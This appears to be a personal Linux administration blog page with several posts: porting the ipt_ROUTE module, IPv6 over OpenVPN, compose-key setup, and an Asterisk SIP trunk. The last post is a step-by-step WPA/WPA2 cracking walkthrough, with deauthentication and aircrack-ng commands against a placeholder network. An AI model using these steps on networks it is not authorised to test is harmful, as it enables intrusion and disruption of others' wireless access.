May 18
TomLinux General, Linux System Administration, Networking
The ipt_ROUTE module became depreciated in an earlier version of Linux 2.6 – however I needed it so ported it to Linux Kernel version 2.6.31.
Disclaimer: wherever possible iproute2 should be used to achieve the desired effect.
The sources include the Kernel module and extensions to iptables.
This module and iptables extension create a new target which may be used on the mangle table.
Target usage: -j ROUTE <option>
options:
–oif ifname – Route packet through `ifname’ network interface
–iif ifname – Change packet’s incoming interface to `ifname’
–gw ip – Route packet via this gateway `ip’
–continue – Route packet and continue traversing the rules. (Not valid with –iif or –tee)
–tee – Duplicate packet and route the duplicate, continue traversing the original packet. (Not valid with –iif or –continue)
I have tested the ported module on the PREROUTING and INPUT chains of the mangle table.
I use this module to route packets that have a destination IP address which matches a local IP address, out of an ethernet interface (using ‘–oif’ option). These packets would normally be directed to the local system.
Apr 21
TomIPv6, Linux System Administration, Networking
Note: IPv6 is not supported using OpenVPN on Debian Squeeze (stable). The version used by Debian Wheezy (testing) supports IPv6.
Network setup:
- 192.168.1.0/24 - Local IPv4 network
- 2001:412:abcd::/48 - Local IPv6 network
- 192.168.2.0/24 - Tunnel IPv4 network
- 2001:412:abcd:2::/64 - Tunnel IPv6 network
I have included only the sections of config files which need ammending to enable IPv6 over OpenVPN.
Client Config
# Use the same setting as you are using on
# the server.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun
# enable ipv6
tun-ipv6
Server Config
# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tun0
# Enable TUN IPv6 module
tun-ipv6
# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 192.168.2.0 255.255.255.0
server-ipv6 2001:412:abcd:2::/64
# Push routes to the client to allow it
# to reach other private subnets behind
# the server. Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
push "route 192.168.1.0 255.255.255.0"
push "route-ipv6 2001:412:abcd::/48
# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"
# Enable to make openvpn the default route for ipv6 connectivity?
;push "route-ipv6 2000::/3"
Feb 20
TomLinux General
The compose key may be used to type unicode characters easily on Linux systems…
All of these commands should be executed as a normal user, no root access required:
- Identify the key you want to use as your compose key, I use the ‘Windows’ key:
- Run the application xev
- Press the key you want to use as your compose key
- Note down the keycode value (my Windows key identifies as keycode=133)
- Edit the file ~/.Xmodmap and insert the line
keycode 133 = Multi_key
- Run xmodmap ~/.Xmodmap
Restart X and you will be able to use unicode:
<Compose key> + " + u = ü
<Compose key> + ' + e = é
<Compose key> + o + r = ®
<Compose key> + - + y = ¥
and many more…
(Tested and in current use on Debian Wheezy)
Mar 19
TomNetworking
As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.
In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)
In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)
The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic unlike a tradition SIP trunk.
Mar 19
TomLinux General, Networking, Wireless
WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:
- Stop Network Manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
- Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
- Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay –deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 –ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
- Apply brute force: aircrack-ng -w password.lst capturefile.cap
- The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
- Stop monitor mode: airmon-ng stop mon0
Older Entries
RSS